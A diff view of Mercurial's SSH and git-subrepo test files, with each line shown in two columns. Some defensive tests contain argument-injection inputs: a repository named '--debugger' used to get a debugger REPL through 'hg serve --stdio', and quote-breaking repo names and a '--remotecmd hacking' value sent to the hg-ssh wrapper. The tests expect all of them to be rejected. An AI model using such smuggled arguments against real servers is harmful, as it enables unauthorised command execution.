271 > sys.stdout.write("KABOOM IN PROCESS\n")
272 > EOF
272 > EOF
273
273
274 $ cat <<EOF >> ../remote/.hg/hgrc
274 $ cat <<EOF >> ../remote/.hg/hgrc
275 > [hooks]
275 > [hooks]
276 > changegroup.stdout = $PYTHON $TESTTMP/badhook
276 > changegroup.stdout = $PYTHON $TESTTMP/badhook
277 > changegroup.pystdout = python:$TESTTMP/badpyhook.py:hook
277 > changegroup.pystdout = python:$TESTTMP/badpyhook.py:hook
278 > EOF
278 > EOF
279 $ echo r > r
279 $ echo r > r
280 $ hg ci -A -m z r
280 $ hg ci -A -m z r
281
281
282 push should succeed even though it has an unexpected response
282 push should succeed even though it has an unexpected response
283
283
284 $ hg push
284 $ hg push
285 pushing to ssh://user@dummy/remote
285 pushing to ssh://user@dummy/remote
286 searching for changes
286 searching for changes
287 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
287 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
288 remote: adding changesets
288 remote: adding changesets
289 remote: adding manifests
289 remote: adding manifests
290 remote: adding file changes
290 remote: adding file changes
291 remote: added 1 changesets with 1 changes to 1 files
291 remote: added 1 changesets with 1 changes to 1 files
292 remote: KABOOM
292 remote: KABOOM
293 remote: KABOOM IN PROCESS
293 remote: KABOOM IN PROCESS
294 $ hg -R ../remote heads
294 $ hg -R ../remote heads
295 changeset: 5:1383141674ec
295 changeset: 5:1383141674ec
296 tag: tip
296 tag: tip
297 parent: 3:a28a9d1a809c
297 parent: 3:a28a9d1a809c
298 user: test
298 user: test
299 date: Thu Jan 01 00:00:00 1970 +0000
299 date: Thu Jan 01 00:00:00 1970 +0000
300 summary: z
300 summary: z
301
301
302 changeset: 4:6c0482d977a3
302 changeset: 4:6c0482d977a3
303 parent: 0:1160648e36ce
303 parent: 0:1160648e36ce
304 user: test
304 user: test
305 date: Thu Jan 01 00:00:00 1970 +0000
305 date: Thu Jan 01 00:00:00 1970 +0000
306 summary: z
306 summary: z
307
307
308
308
309 clone bookmarks
309 clone bookmarks
310
310
311 $ hg -R ../remote bookmark test
311 $ hg -R ../remote bookmark test
312 $ hg -R ../remote bookmarks
312 $ hg -R ../remote bookmarks
313 * test 4:6c0482d977a3
313 * test 4:6c0482d977a3
314 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
314 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
315 requesting all changes
315 requesting all changes
316 adding changesets
316 adding changesets
317 adding manifests
317 adding manifests
318 adding file changes
318 adding file changes
319 added 6 changesets with 5 changes to 4 files (+1 heads)
319 added 6 changesets with 5 changes to 4 files (+1 heads)
320 updating to branch default
320 updating to branch default
321 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
321 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
322 $ hg -R local-bookmarks bookmarks
322 $ hg -R local-bookmarks bookmarks
323 test 4:6c0482d977a3
323 test 4:6c0482d977a3
324
324
325 passwords in ssh urls are not supported
325 passwords in ssh urls are not supported
326 (we use a glob here because different Python versions give different
326 (we use a glob here because different Python versions give different
327 results here)
327 results here)
328
328
329 $ hg push ssh://user:erroneouspwd@dummy/remote
329 $ hg push ssh://user:erroneouspwd@dummy/remote
330 pushing to ssh://user:*@dummy/remote (glob)
330 pushing to ssh://user:*@dummy/remote (glob)
331 abort: password in URL not supported!
331 abort: password in URL not supported!
332 [255]
332 [255]
333
333
334 $ cd ..
334 $ cd ..
335
335
336 hide outer repo
336 hide outer repo
337 $ hg init
337 $ hg init
338
338
339 Test remote paths with spaces (issue2983):
339 Test remote paths with spaces (issue2983):
340
340
341 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
341 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
342 $ touch "$TESTTMP/a repo/test"
342 $ touch "$TESTTMP/a repo/test"
343 $ hg -R 'a repo' commit -A -m "test"
343 $ hg -R 'a repo' commit -A -m "test"
344 adding test
344 adding test
345 $ hg -R 'a repo' tag tag
345 $ hg -R 'a repo' tag tag
346 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
346 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
347 73649e48688a
347 73649e48688a
348
348
349 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
349 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
350 abort: unknown revision 'noNoNO'!
350 abort: unknown revision 'noNoNO'!
351 [255]
351 [255]
352
352
353 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
353 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
354
354
355 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
355 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
356 destination directory: a repo
356 destination directory: a repo
357 abort: destination 'a repo' is not empty
357 abort: destination 'a repo' is not empty
358 [255]
358 [255]
359
359
360 Make sure hg is really paranoid in serve --stdio mode. It used to be
360 Make sure hg is really paranoid in serve --stdio mode. It used to be
361 possible to get a debugger REPL by specifying a repo named --debugger.
361 possible to get a debugger REPL by specifying a repo named --debugger.
362 $ hg -R --debugger serve --stdio
362 $ hg -R --debugger serve --stdio
363 abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio']
363 abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio']
364 [255]
364 [255]
365 $ hg -R --config=ui.debugger=yes serve --stdio
365 $ hg -R --config=ui.debugger=yes serve --stdio
366 abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio']
366 abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio']
367 [255]
367 [255]
368 Abbreviations of 'serve' also don't work, to avoid shenanigans.
368 Abbreviations of 'serve' also don't work, to avoid shenanigans.
369 $ hg -R narf serv --stdio
369 $ hg -R narf serv --stdio
370 abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
370 abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
371 [255]
371 [255]
372
372
373 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
373 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
374 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
374 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
375 parameters:
375 parameters:
376
376
377 $ cat > ssh.sh << EOF
377 $ cat > ssh.sh << EOF
378 > userhost="\$1"
378 > userhost="\$1"
379 > SSH_ORIGINAL_COMMAND="\$2"
379 > SSH_ORIGINAL_COMMAND="\$2"
380 > export SSH_ORIGINAL_COMMAND
380 > export SSH_ORIGINAL_COMMAND
381 > PYTHONPATH="$PYTHONPATH"
381 > PYTHONPATH="$PYTHONPATH"
382 > export PYTHONPATH
382 > export PYTHONPATH
383 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
383 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
384 > EOF
384 > EOF
385
385
386 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
386 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
387 73649e48688a
387 73649e48688a
388
388
389 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
389 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
390 remote: Illegal repository "$TESTTMP/a'repo" (glob)
390 remote: Illegal repository "$TESTTMP/a'repo" (glob)
391 abort: no suitable response from remote hg!
391 abort: no suitable response from remote hg!
392 [255]
392 [255]
393
393
394 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
394 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
395 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
395 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
396 abort: no suitable response from remote hg!
396 abort: no suitable response from remote hg!
397 [255]
397 [255]
398
398
399 $ SSH_ORIGINAL_COMMAND="'hg' -R 'a'repo' serve --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
399 $ SSH_ORIGINAL_COMMAND="'hg' -R 'a'repo' serve --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
400 Illegal command "'hg' -R 'a'repo' serve --stdio": No closing quotation
400 Illegal command "'hg' -R 'a'repo' serve --stdio": No closing quotation
401 [255]
401 [255]
402
402
403 Test hg-ssh in read-only mode:
403 Test hg-ssh in read-only mode:
404
404
405 $ cat > ssh.sh << EOF
405 $ cat > ssh.sh << EOF
406 > userhost="\$1"
406 > userhost="\$1"
407 > SSH_ORIGINAL_COMMAND="\$2"
407 > SSH_ORIGINAL_COMMAND="\$2"
408 > export SSH_ORIGINAL_COMMAND
408 > export SSH_ORIGINAL_COMMAND
409 > PYTHONPATH="$PYTHONPATH"
409 > PYTHONPATH="$PYTHONPATH"
410 > export PYTHONPATH
410 > export PYTHONPATH
411 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
411 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
412 > EOF
412 > EOF
413
413
414 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
414 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
415 requesting all changes
415 requesting all changes
416 adding changesets
416 adding changesets
417 adding manifests
417 adding manifests
418 adding file changes
418 adding file changes
419 added 6 changesets with 5 changes to 4 files (+1 heads)
419 added 6 changesets with 5 changes to 4 files (+1 heads)
420 updating to branch default
420 updating to branch default
421 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
421 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
422
422
423 $ cd read-only-local
423 $ cd read-only-local
424 $ echo "baz" > bar
424 $ echo "baz" > bar
425 $ hg ci -A -m "unpushable commit" bar
425 $ hg ci -A -m "unpushable commit" bar
426 $ hg push --ssh "sh ../ssh.sh"
426 $ hg push --ssh "sh ../ssh.sh"
427 pushing to ssh://user@dummy/*/remote (glob)
427 pushing to ssh://user@dummy/*/remote (glob)
428 searching for changes
428 searching for changes
429 remote: Permission denied
429 remote: Permission denied
430 remote: pretxnopen.hg-ssh hook failed
430 remote: pretxnopen.hg-ssh hook failed
431 abort: push failed on remote
431 abort: push failed on remote
432 [255]
432 [255]
433
433
434 $ cd ..
434 $ cd ..
435
435
436 stderr from remote commands should be printed before stdout from local code (issue4336)
436 stderr from remote commands should be printed before stdout from local code (issue4336)
437
437
438 $ hg clone remote stderr-ordering
438 $ hg clone remote stderr-ordering
439 updating to branch default
439 updating to branch default
440 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
440 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
441 $ cd stderr-ordering
441 $ cd stderr-ordering
442 $ cat >> localwrite.py << EOF
442 $ cat >> localwrite.py << EOF
443 > from mercurial import exchange, extensions
443 > from mercurial import exchange, extensions
444 >
444 >
445 > def wrappedpush(orig, repo, *args, **kwargs):
445 > def wrappedpush(orig, repo, *args, **kwargs):
446 > res = orig(repo, *args, **kwargs)
446 > res = orig(repo, *args, **kwargs)
447 > repo.ui.write('local stdout\n')
447 > repo.ui.write('local stdout\n')
448 > return res
448 > return res
449 >
449 >
450 > def extsetup(ui):
450 > def extsetup(ui):
451 > extensions.wrapfunction(exchange, 'push', wrappedpush)
451 > extensions.wrapfunction(exchange, 'push', wrappedpush)
452 > EOF
452 > EOF
453
453
454 $ cat >> .hg/hgrc << EOF
454 $ cat >> .hg/hgrc << EOF
455 > [paths]
455 > [paths]
456 > default-push = ssh://user@dummy/remote
456 > default-push = ssh://user@dummy/remote
457 > [ui]
457 > [ui]
458 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
458 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
459 > [extensions]
459 > [extensions]
460 > localwrite = localwrite.py
460 > localwrite = localwrite.py
461 > EOF
461 > EOF
462
462
463 $ echo localwrite > foo
463 $ echo localwrite > foo
464 $ hg commit -m 'testing localwrite'
464 $ hg commit -m 'testing localwrite'
465 $ hg push
465 $ hg push
466 pushing to ssh://user@dummy/remote
466 pushing to ssh://user@dummy/remote
467 searching for changes
467 searching for changes
468 remote: adding changesets
468 remote: adding changesets
469 remote: adding manifests
469 remote: adding manifests
470 remote: adding file changes
470 remote: adding file changes
471 remote: added 1 changesets with 1 changes to 1 files
471 remote: added 1 changesets with 1 changes to 1 files
472 remote: KABOOM
472 remote: KABOOM
473 remote: KABOOM IN PROCESS
473 remote: KABOOM IN PROCESS
474 local stdout
474 local stdout
475
475
476 debug output
476 debug output
477
477
478 $ hg pull --debug ssh://user@dummy/remote
478 $ hg pull --debug ssh://user@dummy/remote
479 pulling from ssh://user@dummy/remote
479 pulling from ssh://user@dummy/remote
480 running .* ".*/dummyssh" user@dummy ('|")hg -R remote serve --stdio('|") (re)
480 running .* ".*/dummyssh" ['"]user@dummy['"] ('|")hg -R remote serve --stdio('|") (re)
481 sending hello command
481 sending hello command
482 sending between command
482 sending between command
483 remote: 355
483 remote: 355
484 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
484 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
485 remote: 1
485 remote: 1
486 query 1; heads
486 query 1; heads
487 sending batch command
487 sending batch command
488 searching for changes
488 searching for changes
489 all remote heads known locally
489 all remote heads known locally
490 no changes found
490 no changes found
491 sending getbundle command
491 sending getbundle command
492 bundle2-input-bundle: with-transaction
492 bundle2-input-bundle: with-transaction
493 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
493 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
494 bundle2-input-part: total payload size 15
494 bundle2-input-part: total payload size 15
495 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
495 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
496 bundle2-input-part: total payload size 45
496 bundle2-input-part: total payload size 45
497 bundle2-input-bundle: 1 parts total
497 bundle2-input-bundle: 1 parts total
498 checking for updated bookmarks
498 checking for updated bookmarks
499
499
500 $ cd ..
500 $ cd ..
501
501
502 $ cat dummylog
502 $ cat dummylog
503 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
503 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
504 Got arguments 1:user@dummy 2:hg -R $TESTTMP/nonexistent serve --stdio
504 Got arguments 1:user@dummy 2:hg -R $TESTTMP/nonexistent serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
506 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
507 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
507 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
509 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
509 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
510 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
510 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
511 Got arguments 1:user@dummy 2:hg -R local serve --stdio
511 Got arguments 1:user@dummy 2:hg -R local serve --stdio
512 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
512 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
513 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
513 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
514 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
514 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
515 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
515 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
518 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
518 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
519 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
519 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
520 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
520 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
521 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
521 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
522 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
522 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
523 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
523 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
524 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
524 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
525 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
525 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
526 Got arguments 1:user@dummy 2:hg init 'a repo'
526 Got arguments 1:user@dummy 2:hg init 'a repo'
527 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
527 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
528 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
528 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
529 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
529 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
530 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
530 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
531 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
531 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
532 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
532 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
533 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
533 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
534
534
535 remote hook failure is attributed to remote
535 remote hook failure is attributed to remote
536
536
537 $ cat > $TESTTMP/failhook << EOF
537 $ cat > $TESTTMP/failhook << EOF
538 > def hook(ui, repo, **kwargs):
538 > def hook(ui, repo, **kwargs):
539 > ui.write('hook failure!\n')
539 > ui.write('hook failure!\n')
540 > ui.flush()
540 > ui.flush()
541 > return 1
541 > return 1
542 > EOF
542 > EOF
543
543
544 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
544 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
545
545
546 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
546 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
547 $ cd hookout
547 $ cd hookout
548 $ touch hookfailure
548 $ touch hookfailure
549 $ hg -q commit -A -m 'remote hook failure'
549 $ hg -q commit -A -m 'remote hook failure'
550 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
550 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
551 pushing to ssh://user@dummy/remote
551 pushing to ssh://user@dummy/remote
552 searching for changes
552 searching for changes
553 remote: adding changesets
553 remote: adding changesets
554 remote: adding manifests
554 remote: adding manifests
555 remote: adding file changes
555 remote: adding file changes
556 remote: added 1 changesets with 1 changes to 1 files
556 remote: added 1 changesets with 1 changes to 1 files
557 remote: hook failure!
557 remote: hook failure!
558 remote: transaction abort!
558 remote: transaction abort!
559 remote: rollback completed
559 remote: rollback completed
560 remote: pretxnchangegroup.fail hook failed
560 remote: pretxnchangegroup.fail hook failed
561 abort: push failed on remote
561 abort: push failed on remote
562 [255]
562 [255]
563
563
564 abort during pull is properly reported as such
564 abort during pull is properly reported as such
565
565
566 $ echo morefoo >> ../remote/foo
566 $ echo morefoo >> ../remote/foo
567 $ hg -R ../remote commit --message "more foo to be pulled"
567 $ hg -R ../remote commit --message "more foo to be pulled"
568 $ cat >> ../remote/.hg/hgrc << EOF
568 $ cat >> ../remote/.hg/hgrc << EOF
569 > [extensions]
569 > [extensions]
570 > crash = ${TESTDIR}/crashgetbundler.py
570 > crash = ${TESTDIR}/crashgetbundler.py
571 > EOF
571 > EOF
572 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
572 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
573 pulling from ssh://user@dummy/remote
573 pulling from ssh://user@dummy/remote
574 searching for changes
574 searching for changes
575 remote: abort: this is an exercise
575 remote: abort: this is an exercise
576 abort: pull failed on remote
576 abort: pull failed on remote
577 [255]
577 [255]
@@ -1,1184 +1,1215 b''
1 #require git
1 #require git
2
2
3 make git commits repeatable
3 make git commits repeatable
4
4
5 $ cat >> $HGRCPATH <<EOF
5 $ cat >> $HGRCPATH <<EOF
6 > [defaults]
6 > [defaults]
7 > commit = -d "0 0"
7 > commit = -d "0 0"
8 > EOF
8 > EOF
9
9
10 $ echo "[core]" >> $HOME/.gitconfig
10 $ echo "[core]" >> $HOME/.gitconfig
11 $ echo "autocrlf = false" >> $HOME/.gitconfig
11 $ echo "autocrlf = false" >> $HOME/.gitconfig
12 $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
12 $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
13 $ GIT_AUTHOR_EMAIL='test@example.org'; export GIT_AUTHOR_EMAIL
13 $ GIT_AUTHOR_EMAIL='test@example.org'; export GIT_AUTHOR_EMAIL
14 $ GIT_AUTHOR_DATE='1234567891 +0000'; export GIT_AUTHOR_DATE
14 $ GIT_AUTHOR_DATE='1234567891 +0000'; export GIT_AUTHOR_DATE
15 $ GIT_COMMITTER_NAME="$GIT_AUTHOR_NAME"; export GIT_COMMITTER_NAME
15 $ GIT_COMMITTER_NAME="$GIT_AUTHOR_NAME"; export GIT_COMMITTER_NAME
16 $ GIT_COMMITTER_EMAIL="$GIT_AUTHOR_EMAIL"; export GIT_COMMITTER_EMAIL
16 $ GIT_COMMITTER_EMAIL="$GIT_AUTHOR_EMAIL"; export GIT_COMMITTER_EMAIL
17 $ GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"; export GIT_COMMITTER_DATE
17 $ GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"; export GIT_COMMITTER_DATE
18 $ GIT_CONFIG_NOSYSTEM=1; export GIT_CONFIG_NOSYSTEM
18 $ GIT_CONFIG_NOSYSTEM=1; export GIT_CONFIG_NOSYSTEM
19
19
20 root hg repo
20 root hg repo
21
21
22 $ hg init t
22 $ hg init t
23 $ cd t
23 $ cd t
24 $ echo a > a
24 $ echo a > a
25 $ hg add a
25 $ hg add a
26 $ hg commit -m a
26 $ hg commit -m a
27 $ cd ..
27 $ cd ..
28
28
29 new external git repo
29 new external git repo
30
30
31 $ mkdir gitroot
31 $ mkdir gitroot
32 $ cd gitroot
32 $ cd gitroot
33 $ git init -q
33 $ git init -q
34 $ echo g > g
34 $ echo g > g
35 $ git add g
35 $ git add g
36 $ git commit -q -m g
36 $ git commit -q -m g
37
37
38 add subrepo clone
38 add subrepo clone
39
39
40 $ cd ../t
40 $ cd ../t
41 $ echo 's = [git]../gitroot' > .hgsub
41 $ echo 's = [git]../gitroot' > .hgsub
42 $ git clone -q ../gitroot s
42 $ git clone -q ../gitroot s
43 $ hg add .hgsub
43 $ hg add .hgsub
44 $ hg commit -m 'new git subrepo'
44 $ hg commit -m 'new git subrepo'
45 $ hg debugsub
45 $ hg debugsub
46 path s
46 path s
47 source ../gitroot
47 source ../gitroot
48 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
48 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
49
49
50 record a new commit from upstream from a different branch
50 record a new commit from upstream from a different branch
51
51
52 $ cd ../gitroot
52 $ cd ../gitroot
53 $ git checkout -q -b testing
53 $ git checkout -q -b testing
54 $ echo gg >> g
54 $ echo gg >> g
55 $ git commit -q -a -m gg
55 $ git commit -q -a -m gg
56
56
57 $ cd ../t/s
57 $ cd ../t/s
58 $ git pull -q >/dev/null 2>/dev/null
58 $ git pull -q >/dev/null 2>/dev/null
59 $ git checkout -q -b testing origin/testing >/dev/null
59 $ git checkout -q -b testing origin/testing >/dev/null
60
60
61 $ cd ..
61 $ cd ..
62 $ hg status --subrepos
62 $ hg status --subrepos
63 M s/g
63 M s/g
64 $ hg commit -m 'update git subrepo'
64 $ hg commit -m 'update git subrepo'
65 $ hg debugsub
65 $ hg debugsub
66 path s
66 path s
67 source ../gitroot
67 source ../gitroot
68 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
68 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
69
69
70 make $GITROOT pushable, by replacing it with a clone with nothing checked out
70 make $GITROOT pushable, by replacing it with a clone with nothing checked out
71
71
72 $ cd ..
72 $ cd ..
73 $ git clone gitroot gitrootbare --bare -q
73 $ git clone gitroot gitrootbare --bare -q
74 $ rm -rf gitroot
74 $ rm -rf gitroot
75 $ mv gitrootbare gitroot
75 $ mv gitrootbare gitroot
76
76
77 clone root
77 clone root
78
78
79 $ cd t
79 $ cd t
80 $ hg clone . ../tc 2> /dev/null
80 $ hg clone . ../tc 2> /dev/null
81 updating to branch default
81 updating to branch default
82 cloning subrepo s from $TESTTMP/gitroot
82 cloning subrepo s from $TESTTMP/gitroot
83 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
83 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
84 $ cd ../tc
84 $ cd ../tc
85 $ hg debugsub
85 $ hg debugsub
86 path s
86 path s
87 source ../gitroot
87 source ../gitroot
88 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
88 revision 126f2a14290cd5ce061fdedc430170e8d39e1c5a
89
89
90 update to previous substate
90 update to previous substate
91
91
92 $ hg update 1 -q
92 $ hg update 1 -q
93 $ cat s/g
93 $ cat s/g
94 g
94 g
95 $ hg debugsub
95 $ hg debugsub
96 path s
96 path s
97 source ../gitroot
97 source ../gitroot
98 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
98 revision da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
99
99
100 clone root, make local change
100 clone root, make local change
101
101
102 $ cd ../t
102 $ cd ../t
103 $ hg clone . ../ta 2> /dev/null
